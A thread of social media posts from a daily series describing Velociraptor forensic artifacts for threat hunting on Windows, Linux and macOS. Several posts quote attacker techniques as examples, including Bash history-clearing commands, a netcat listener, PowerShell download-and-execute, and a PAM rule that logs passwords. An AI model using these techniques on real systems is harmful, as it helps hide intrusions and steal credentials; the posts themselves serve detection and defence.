@velocidex Thanks, and agreed! I'm planning on getting the posts into a central location soon. Right now, folks can find them via the #ArtifactsOfAutumn tag.

🦖Day 92 (THE LAST DAY!) of the @velocidex #velociraptor #ArtifactsOfAutumn series

Artifact: Exchange\.Windows.EventLogs.WonkaVision

Link: https://docs.velociraptor.app/exchange/artifacts/pages/windows.eventlogs.wonkavision

----

WonkaVision is a proof of concept (POC) tool to analyze Kerberos tickets and attempt to determine if they are forged (ex. #GoldenTicket), created by @exploitph and @4ndr3w6S.

https://github.com/0xe7/WonkaVision

Presenation:
https://github.com/0xe7/Talks/blob/main/Andrew_Charlie_SANS_Hackfest_2022_revised.pdf

----

This artifact can run WonkaVision, then collect its generated Windows event logs. From the event logs, we can detect potentially forged Kerberos tickets.

----

This concludes the #ArtifactsOfAutumn. Hope you enjoyed it, and thanks for all of the support!

#DFIR
#Forensics
#GoldenTicket
#infosec
#ThreatHunting
#WonkaVision

🦖Day 91 of the @velocidex #velociraptor #ArtifactsOfAutumn series

Artifact: Exchange.IRIS.Sync.Asset

Author: @StephMikiss

Link: https://docs.velociraptor.app/exchange/artifacts/pages/iris.sync.asset

----

This artifact synchronizes clients from Velociraptor to DFIR-IRIS (https://dfir-iris.org/). It will parse available information of clients such as network interfaces, IP addresses, asset type and applied labels.

----

For those unfamiliar with DFIR-IRIS (@dfir_iris), it is a free, open source incident response platform that includes a host of useful and innovative features even many commercial platforms don't possess. Check it out here using the link below!

https://dfir-iris.org/

----

Once a client has been added to DFIR-IRIS, the asset ID from DFIR-IRIS will be added as client metadata and ‘IRIS’ will be added as label.

If a client already possesses an asset ID, it will be updated; in general, labels and the compromised status will by synchronized.

----

This artifact is very powerful due to the fact that we can quickly add clients to DFIR-IRIS from Velociraptor with very little effort.

This means that we can spend less time on managerial tasks, and more time on investigating and remediating the hosts we deem compromised.

----

That's it for now! Stay tuned to learn about more artifacts! 🦖

#DFIR
#Forensics
#Infosec
#IRIS
#ThreatHunting

🦖Day 90 of the @velocidex #velociraptor #ArtifactsOfAutumn series

Artifact: Exchange.MacOS.UnifiedLogHunter

Link:
https://docs.velociraptor.app/exchange/artifacts/pages/macos.unifiedloghunter

----

With macOS 10.12 (Sierra) came a new way to log system events in a more centralized, unified fashion -- Unified Logs.

Read more here:

https://devstreaming-cdn.apple.com/videos/wwdc/2016/721wh2etddp4ghxhpcg/721/721_unified_logging_and_activity_tracing.pdf

These logs can be of great importance to investigators searching for artifacts of adversary activity.

----

@crowdstrike , @Mandiant, and others have done a great job covering the usefulness and technical details surrounding the Unified Logging system.

https://www.crowdstrike.com/blog/how-to-leverage-apple-unified-log-for-incident-response/

https://www.mandiant.com/resources/blog/reviewing-macos-unified-logs

----

This artifact is a wrapper around the 'log' command, allowing defenders to easily review events from the logs from the many subsystems of the Unified Logging infrastructure.

It provides the ability to search using a custom or pre-defined filter, and is great for live hunting.

----

If you are looking to collect only raw files and parse them later, or for a third party tool to process the data, check out the Exchange.MacOS.UnifiedLogParser artifact.

https://docs.velociraptor.app/exchange/artifacts/pages/macos.unifiedlogparser/

----

This information provided by this artifact includes:

- Event time/message/type
- Message type
- Category
- Subsystem
- PID
- Process image Path/UUID
- Sender image Path/UUID
- Sender program counter
- Activity ID
- Parent activity ID

----

That's it for now! Stay tuned to learn about more artifacts! 🦖

#DFIR
#Forensics
#Infosec
#macOS
#ThreatHunting
#UnifiedLogs

@r34p3r @velocidex @mgreen27 @svch0st This is the 89th entry in the series 😀​. All of the entries should be accessible using the #ArtifactsOfAutumn tag (here, and previously on Twitter). I plan on compiling them into a single resource at some point after the end of the series.

🦖Day 89 of the @velocidex #velociraptor #ArtifactsOfAutumn series

Artifact: Exchange.Server.Import.DetectRaptor

Author: @mgreen27, with content references to @svch0st and #Sigma.

Link: https://docs.velociraptor.app/exchange/artifacts/pages/detectraptor

----

DetectRaptor is a collection of publicly available Velociraptor detection content. Most content is managed by a series of CSV files and artifacts are automatically updated.

https://github.com/mgreen27/DetectRaptor

This artifact will import the latest DetectRaptor bundle into the current server.

----

DetectRaptor currently includes the following artifacts:

Windows.Detection.Applications Windows.Detection.BinaryRename
Windows.Detection.Evtx
Windows.Detection.MFT
Windows.Detection.NamedPipes
Windows.Detection.Webhistory
Windows.Detection.ZoneIdentifier
Server.StartHunts

----

Most of these artifacts contain content in CSV files that provide for bulk detection capability.

The CSVs can be updated as needed to add new detections.

The artifacts are generated from a VQL template, and the associated CSV via their own Python script.

----

The Server.StartHunts artifact is useful for kicking off hunts for the artifacts within the DetectRaptor hundle.

We can leverage the DetectRaptor bundle in a hunt or single client collection to cast a wide net, then review detection hits for items of interest.

----

That's it for now! Stay tuned to learn about more artifacts! 🦖

#DFIR
#Forensics
#Infosec
#ThreatHunting

🦖Day 88 of the @velocidex #velociraptor #ArtifactsOfAutumn series

Artifact: Exchange.Linux.System.BashLogout

Link: https://docs.velociraptor.app/exchange/artifacts/pages/linux.system.bashlogout

----

This artifact captures information from about Bash logout files for examination of abnormal activity.

Bash logout files are used to run certain commands upon user logout, such as clearing the shell or terminal state.

----

An adversary could leverage this capability to cover their tracks by clearing logs, deleting files, etc.

Once example of this is running the following command at logout to clear the user's Bash history:

'history -c'
'cat /dev/null > ~/.bash_history'

https://attack.mitre.org/techniques/T1070/003/

----

This artifact also includes a content filter ('ContentFilter') to allow for searching for various content within the file.

Additionally, in-scope Bash logout files can be uploaded to the Velociraptor server by checking the box for the 'UploadFiles' option.

----

That's it for now! Stay tuned to learn about more artifacts! 🦖

#DFIR
#Forensics
#Infosec
#Linux
#T1070.003
#ThreatHunting

🦖Day 87 of the @velocidex #velociraptor #ArtifactsOfAutumn series

Artifact: Exchange.Server.Enrichment.OpenAI

Link: https://docs.velociraptor.app/exchange/artifacts/pages/server.enrichment.openai

----

Have you been enamored with all of the talk of #ChatGPT and #OpenAI, and how it could potentially assist defenders during detection engineering, incident response, or threat hunting?

Now you can experiment with integration of this functionality into Velociraptor!

----

This artifact allows for enrichment of results by querying the OpenAI API.

It leverages the 'text-davinci-003' language model by default, although the model is configurable.

The maximum number of tokens is also configurable, which can affect the response provided by OpenAI.

----

The intention of this artifact is to enrich results from other artifacts, although, it can be used on its own as well.

In one example, we ask if a command line value ('nc -l 1337') is suspicious. 🔍

In another example, we ask about the best features of Velociraptor🦖😃

----

NOTE: You may want to be careful providing sensitive information to OpenAI. However, this artifact can still be used to experiment with potential analysis and investigation improvements. With great power comes great responsibility! 🕷️🕸️

READ:
https://help.openai.com/en/articles/5722486-how-your-data-is-used-to-improve-model-performance

----

That's it for now! Stay tuned to learn about more artifacts! 🦖

#ChatGPT
#DFIR
#Forensics
#Infosec
#OpenAI
#ThreatHunting

🦖Day 86 of the
@velocidex
#velociraptor #ArtifactsOfAutumn series

Artifact: Windows.Memory.Acquisition

Link: https://docs.velociraptor.app/artifact_references/pages/windows.memory.acquisition

----

This artifact leverages Winpmem to acquire a full memory image of the endpoint.

While it is ideals to process and filter data as quickly as possible on the endpoint, in certain instances it may still be beneficial or necessary to obtain a copy of the endpoint's physical memory.

----

This artifact could also be used in conjunction with the offline collector to obtain a memory image with a triage binary as opposed to requiring a client to be connected to the Velociraptor server.

The image could then be processed with your favorite memory analysis framework.

----

That's it for now! Stay tuned to learn about more artifacts! 🦖

#DFIR
#Forensics
#Infosec
#MemoryForensics

🦖Day 85 of the @velocidex #velociraptor #ArtifactsOfAutumn series

Artifact: Exchange.MacOS.Applications.Notes

Link: https://docs.velociraptor.app/exchange/artifacts/pages/macos.applications.notes

----

This artifact provides details about notes taken using the default Notes application on macOS.

These notes can be useful during an investigation, especially if tied to interesting files.

Deleted notes and attachments can also be recovered in some instances.

----

The information provided by this artifact includes:

- User that created the note
- Note ID/title/text
- Note creation time
- Note modification time
- Note last opened time
- Note folder ID/location
- Attachment name/size/UUID

Attachments can also be uploaded, if desired.

----

That's it for now! Stay tuned to learn about more artifacts! 🦖

If you want to learn more about the macOS Notes database, check out Yogesh Khatri's blog article using the link below!

http://www.swiftforensics.com/2018/02/reading-notes-database-on-macos.html

#DFIR
#Forensics
#Infosec
#macOS
#ThreatHunting

🦖Day 84 of the @velocidex #velociraptor #ArtifactsOfAutumn series

Artifact: Windows.NTFS.ADSHunter

Author: @mgreen27

Link:
https://docs.velociraptor.app/artifact_references/pages/windows.ntfs.adshunter

----

Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every NTFS partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition.

Within MFT entries are file attributes, such as Extended Attributes (EA) and Alternate Data Streams or (ADSs) when more than one Data attribute is present. The stream can be used to store arbitrary data (and even complete files).

Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus.

https://attack.mitre.org/techniques/T1564/004/

----

BitPaymer, a ransomware variant, has been known to leverage ADSs by copying itself to an ADS called ':bin', then creating a process from the stream.

https://attack.mitre.org/software/S0570/

https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/

----

This artifact hunts for alternate data streams using a variety of options for targeting, including:

- Directory
- ADS name (inclusion or exclusion)
- ADS Content
- Minimum content size
- Maximum content size

Once found, a stream can also be uploaded to the Velociraptor server.

----

That's it for now! Stay tuned to learn about more artifacts! 🦖

If you would like to experiment with ADSs for yourself, check out the link to the associated Atomic Red Team tests below!

https://atomicredteam.io/defense-evasion/T1564.004/

#DFIR
#Forensics
#Infosec
#T1564.004
#ThreatHunting
#Windows

🦖Day 83 of the @velocidex #velociraptor #ArtifactsOfAutumn series

Artifact: Server.Utils.BackupGCS/S3

Link:
https://docs.velociraptor.app/artifact_references/pages/server.utils.backupgcs/

https://docs.velociraptor.app/artifact_references/pages/server.utils.backups3/

----

These artifacts are server monitoring artifacts that will watch for flow completions, then zip and send the results to Google Cloud, or an S3 bucket, using the 'upload_gcs()' and 'upload_s3()' functions.

https://docs.velociraptor.app/vql_reference/plugin/upload_gcs

https://docs.velociraptor.app/vql_reference/plugin/upload_s3

----

Once uploaded, the collections can be left alone and remain archived, or special post-processing can be applied using third-party tools, depending on defenders' needs.

@eric_capuano and @shortxstack (@recon_infosec) did an excellent job presenting about using these artifacts with Timesketch to generate a timeline of events.

If you haven't already, be sure to check out their presentation from @SANS #DFIR Summit 2021!

https://www.sans.org/presentations/breaches-be-crazy/

----

That's it for now! Stay tuned to learn about more artifacts! 🦖

#DFIR
#Forensics
#Infosec
#Plaso
#ThreatHunting
#Timesketch

🦖Day 82 of the @velocidex #velociraptor #ArtifactsOfAutumn series

Artifact: Exchange.Linux.Forensics.RecentlyUsed

Author: @rxurien

Link: https://docs.velociraptor.app/exchange/artifacts/pages/linux.forensics.recentlyused

----

For GNOME-based desktop environments, the '.local/share/recently-used.xbel' file located under each user's home directory can provide valuable information during an investigation, such as a list of recent files accessed by applications, as well as a source of download history.

----

This artifact uses the parse_xml() function to parse the XML-based 'recently-used.xbel' file.

https://docs.velociraptor.app/vql_reference/parsers/parse_xml

----

This information provided by this artifact includes:

- Associated user
- File that was referenced by the application
- Time added, modified, and last visited
- MIME Type
- Application name and CLI arguments/parameters
- Relevant 'recently-used.xbel' file

----

That's it for now! Stay tuned to learn about more artifacts! 🦖

If you would like to learn more about this technique and others, check out the links below!

#DFIR
#Forensics
#Infosec
#Linux
#ThreatHunting

🦖Day 81 of the @velocidex #velociraptor #ArtifactsOfAutumn series

Artifact: Windows\.Persistence\.PowershellRegistry

Link: https://docs.velociraptor.app/artifact_references/pages/windows.persistence.powershellregistry

----

A common way of persistence is to install a hook into a user profile registry hive, using PowerShell. When the user logs in, the PowerShell script downloads a payload and executes it.

https://attack.mitre.org/techniques/T1112/
https://attack.mitre.org/techniques/T1547/001/

----

This artifact searches user registry hives for signatures related to general Powershell execution.

A YARA signature is used to target the user’s profile, which is extracted using raw NTFS parsing, in case the user is currently logged on and the registry hive is locked.

----

Once detected, a row is returned and the registry hive is uploaded to the Velociraptor server.

In the provided images, we can see an example using mshta\.exe to execute code.

https://redcanary.com/threat-detection-report/techniques/mshta

----

That's it for now! Stay tuned to learn about more artifacts! 🦖

If you would like to learn more about this technique and others, check out the link below, as well as it's references!

https://docs.velociraptor.app/blog/html/2018/09/29/detecting_powershell_persistence_with_velociraptor_and_yara/

#DFIR
#Forensics
#Infosec
#PowerShell
#ThreatHunting
#Windows

🦖Day 80 of the @velocidex #velociraptor #ArtifactsOfAutumn series

Artifact: MacOS.Network\.DHCP

Link: https://docs.velociraptor.app/exchange/artifacts/pages/macos.network.dhcp

----

It can be useful to view DHCP lease information on an endpoint.

If the lease length, DHCP server IP address, SSID, or other configuration details are not as expected, it could potentially indicate a rogue DHCP server on the network, or just misconfiguration.

Either way, the information provided by this artifact can be used to help defenders find unexpected DHCP lease configuration, or associate a device and interface to an IP address.

----

The information provided by this artifact includes:

- Which interfaces are using a DHCP lease
- Last modified time of the interface lease file
- Full path to the lease file
- DHCP server address
- SSID
- Assigned IP address
- Lease length
- Least start date

----

That's it for now! Stay tuned to learn about more artifacts! 🦖

If you would like to learn DHCP-based attacks, such as DHCP spoofing, check out the MITRE ATT&CK article using the link below!
https://attack.mitre.org/techniques/T1557/003/

#DFIR
#Forensics
#Infosec
#macOS
#ThreatHunting

🦖Day 79 of the @velocidex #velociraptor #ArtifactsOfAutumn series

Artifact: Server.Utils.\ImportCollection

Link: https://docs.velociraptor.app/artifact_references/pages/server.utils.importcollection

----

Velociraptor's offline collector feature is an excellent capability to have when dropping into client environments with little to no previous infrastructure, or when triaging systems that are not easily or immediately connected to a corporate network.

https://docs.velociraptor.app/blog/2020/2020-07-14-triage-with-velociraptor-pt-4-cf0e60810d1e/#building-the-offline-collector

----

Users can leverage the offline collector wizard (that leverages the Server.Utils\.CreateCollector artifact) to quickly create a base collector binary, packed with all of the necessary artifacts and tools for their standard host triage.

From there, defenders simply run the binary and an encrypted ZIP file containing the collection results is created.

Until recently, this ZIP file could be encrypted using a password, but this was not ideal, as the password had to be embedded inside the collector configuration.

This meant that anyone with access to the collector binary could see the password. There have recently been great improvements to the collector, to include PKI. An X.509 certificate (the Velociraptor server's by default), or a public key can now be used to encrypt the ZIP file.

----

What this means is that only the server can un-encrypt the ZIP file, and we can now import encrypted collections automatically, without the need for specifying any password.

Simply point to the encrypted collection ZIP file from the Server.Utils.ImportCollection artifact!

Once imported, we can review the results within the GUI, just like a typical collection.

----

That's it for now! Stay tuned to learn about more artifacts! 🦖

If you would like to learn more about the improvements to the offline collections, check out the link below!
https://docs.velociraptor.app/blog/2022/2022-11-21-release-notes/#the-offline-collection-and-encryption

#DFIR
#Forensics
#Infosec
#ThreatHunting

🦖Day 78 of the @velocidex #velociraptor #ArtifactsOfAutumn series

Artifact: Windows.System\.PSReadline

Author: @mgreen27

Link: https://docs.velociraptor.app/artifact_references/pages/windows.system.powershell.psreadline/

----

Adversaries may abuse PowerShell commands and scripts for execution.

In fact, PowerShell is commonly used by attackers across all stages of the attack lifecycle.

They can use PowerShell to perform a number of actions, including discovery of information and execution of code.

----

This artifact will search and extract lines from PSReadline history file.

The PSReadline module is responsible for command history and from Powershell 5 on Windows 10 default configuration saves a copy of the console history to disk.

----

The following parameters are available for use with this artifact:

'SearchStrings' - regex search over a PSReadline line

'StringWhiteList' - regex whitelist for results

'UserRegex' - regex search on username

'UploadFiles' - upload in-scope ConsoleHost_history.txt files

----

Here (image), we can see multiple attempts to download and execute a .ps1 file using 'Net.WebClient' through PowerShell.

Our view into the source of 'Default_File_Path\.ps1' and what it does is somewhat hindered, but we can see that the bit.\ly URL contains the text 'L3g1tCrad1e'.

----

If we were to look at what originally happened during the PowerShell session, we would see that in each instance, the Default_File_Path.ps1 file was downloaded and executed 👀

----

These commands were not necessarily malicious, but used for illustrative purposes. If you would like to test these commands for yourself, check out the Atomic Red Team test using the link below!

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md#atomic-test-4---obfuscation-tests

----

Overall, this artifact includes the following information about the PowerShell console history file:

- Last modified time and other timestamps
- Line number
- Line (commands that were run)
- User
- Path to the PowerShell console history file

----

That's it for now! Stay tuned to learn about more artifacts! 🦖

Also, check out the MITRE ATT&CK page for 'Command and Scripting Interpreter: PowerShell' below!
https://attack.mitre.org/techniques/T1059/001/

#DFIR
#Forensics
#Infosec
#Windows
#T1509.001
#ThreatHunting

🦖Day 77 of the @velocidex #velociraptor #ArtifactsOfAutumn series

Artifact: Exchange.Linux.System\.PAM

Link: https://docs.velociraptor.app/exchange/artifacts/pages/linux.system.pam

----

Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts.

PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services.

----

Malicious modifications to PAM may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.

----

This artifact uses the parse_lines() plugin to parse within the '/etc/pam.d/' directory so that investigators can quickly filter and review the results for relevant or suspicious entries. The 'RecordFilter' parameter can be used to look for specific patterns or strings.

----

Here (results image), we can see an entry in '/etc/pam.d/common-auth' that executes a script called 'toomanysecrets\.sh' upon user login👀. Aside from that, the is also an entry in '/etc/pam.d/su-l' for 'pam_succeed_if' that appears to allow any user escalate to root without the password🥴!

----

For example, executing the command 'su -l root' as 'pbeesly' allows for root access without prompting for a password.

----
If we look at the contents of 'toomanysecrets\.sh', it appears to write to a log file called '/var/log/toomanysecrets.log'.

If we look at the content of the log file, we see...usernames...and...passwords! 😵‍💫

----

Based on what we've found, we can see how useful it can be to have the ability to search the PAM configuration for anomalies, especially across many hosts.

Overall, we can quickly glean the following information from this artifact:

- Last modified time
- File path
- Command

----

If you would like to simulate this activity yourself, try out the Atomic Red Team test below!
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md#atomic-test-1---malicious-pam-rule

If you would like to learn more about how PAM can be abused to gather usernames and passwords at login, check out the following link!
https://book.hacktricks.xyz/linux-hardening/linux-post-exploitation#sniffing-logon-passwords-with-pam

----

That's it for now! Stay tuned to learn about more artifacts! 🦖

Also, check out the MITRE ATT&CK page for 'Modify Authentication Process: Pluggable Authentication Modules' below!
https://attack.mitre.org/techniques/T1556/003/

#DFIR
#Forensics
#Infosec
#Linux
#T1556.003
#ThreatHunting

🦖Day 76 of the @velocidex #velociraptor #ArtifactsOfAutumn series

Artifact: Server.Utils\.SaveFavoriteFlow

Link: https://docs.velociraptor.app/artifact_references/pages/server.utils.savefavoriteflow/

----

Did you know you can save your favorite Velociraptor collections?

It may take a bit of effort to setup and configure an ideal combination of parameters and artifacts within a collection.

This artifact allows the user to save a collection to a 'Favorites' section, for later use.

----

This artifact is typically called by clicking the icon from the "collected" page for a client.

However, this artifact could also be called via the Velociraptor API, or another artifact.

----

Once the 'Save Collection' button/icon has been clicked, a prompt will appear in which users can enter details about the collection.

----

Once saved, the collection can be selected for use.

Simply click the💙icon in the upper right-hand corner of the collection UI to select your favorite collection.

----

After clicking the desired collection, the associated artifacts will be displayed, and the collection can be launched.

----

If you decide you would like to delete a saved collection, you can do so by clicking the trash can icon when a saved collection is selected.

----

That's it for now! Stay tuned to learn about more artifacts! 🦖

#DFIR
#Forensics
#Infosec
#ThreatHunting

🦖Day 75 of the @velocidex #velociraptor #ArtifactsOfAutumn series

Artifact: Exchange.MacOS.Applications\.SavedState

Link: https://docs.velociraptor.app/exchange/artifacts/pages/macos.applications.savedstate

----

On macOS, certain application state is stored in '/Users/*/Library/Saved Application State/'.

We can check these files to determine the last time an application was opened, the title of the application window, and when the app/window was later restored (login/reboot).

----

In general, the following has been observed with regard to saved state files:

- The ‘SavedState’ files are created when the application is started.

- SavedState directory - Btime - Last time the application was opened by the user.

- SavedState directory - ModTime - When the application state was last restored (such as after login/reboot).

- .data files - the actual data within the app, such as the scrollback for a Terminal window. The data within can be an (AES-128-CBC) encrypted blob. This data can be decrypted using the appropriate NSDataKey value found in windows.plist.

- windows.plist – contains the name of application windows (NSTitle), and data like:
- NSDataKey - Enc key
- NSDockMenu\.name – names respective to the user’s dock/etc.
- NSWindowID – can used to link the NSDataKey to the PersistentUIRecord value in the .data file(s).

----

The information provided by this artifact includes:

- Birth time and modification time of each file
- File name and path
- Dock menu name (where applicable)
- Window title (where applicable)
- Window details (other data, such as enc key and reference to .data file)

----

There's a bit to unpack there, but the articles in the links below should provide more of a walkthrough around Saved Application State in macOS.

Thanks, @crowdstrike and @twsecblog !

https://www.crowdstrike.com/blog/reconstructing-command-line-activity-on-macos/

https://www.sans.org/blog/osx-lion-user-interface-preservation-analysis/

----

That's it for now! Stay tuned to learn about more artifacts! 🦖

#DFIR
#Forensics
#Infosec
#macOS
#ThreatHunting